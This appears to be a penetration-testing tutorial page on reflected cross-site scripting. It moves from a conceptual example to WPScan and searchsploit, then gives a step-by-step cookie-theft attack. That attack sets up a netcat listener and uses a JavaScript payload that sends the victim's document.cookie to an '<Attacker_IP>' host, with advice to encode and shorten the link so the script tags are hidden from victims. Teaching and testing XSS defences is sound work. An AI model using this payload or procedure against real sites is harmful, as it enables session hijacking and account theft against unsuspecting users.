4.2 Reflected XSS
Last updated
Last updated
Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
Suppose a website has a search function which receives the user-supplied search term in a URL parameter:
https://insecure-website.com/search?term=gift
The application echoes the supplied search term in the response to this URL:
<p>You searched for: gift</p>
Assuming the application doesn't perform any other processing of the data, an attacker can construct an attack like this:
https://insecure-website.com/search?term=<script>/*+Bad+stuff+here...+*/</script>
This URL results in the following response:
<p>You searched for: <script>/* Bad stuff here... */</script></p>
If another user of the application requests the attacker's URL, then the script supplied by the attacker will execute in the victim user's browser, in the context of their session with the application.
Mainly by not frequently updating installed themes and plugins versions, vulnerabilities may occur, and this is where the WPScan tool comes in.
WPScan is a security scanner specifically designed to test the security of WordPress websites. It can identify security vulnerabilities in WordPress installations, themes, and plugins. WPScan works by scanning the target website for known security issues, such as outdated software versions, weak passwords, and common configuration errors. It helps website owners and developers identify and fix security flaws to protect their websites from potential attacks and breaches.
We can install it using following command: sudo apt-get install wpscan
Go to wpscan.com, register, login and configure account.
Generate an API key/token
Launch scan -> wpscan --url <Website_URL>
See results and search potential exploit on exploitdb using searchsploit <vulnerability_name>
Encode and shorten the link possibly to be sent to the victim (to hiding JS tags)
First verify that website is vulnerable to XSS -> <script>alert("XSS")</script>
Take on listening on attacker machine using netcat -> nc -lvnp 4444
Insert payload at the end of website -> new Image() .src='http://<Attacker_IP>:4444/?cookie=' + encodeURI(document.cookie);
Encode and shorten the link possibly to be sent to the victim (to hiding JS tags), we can use BurpSuite decoder
Obtain connection on netcat in listening.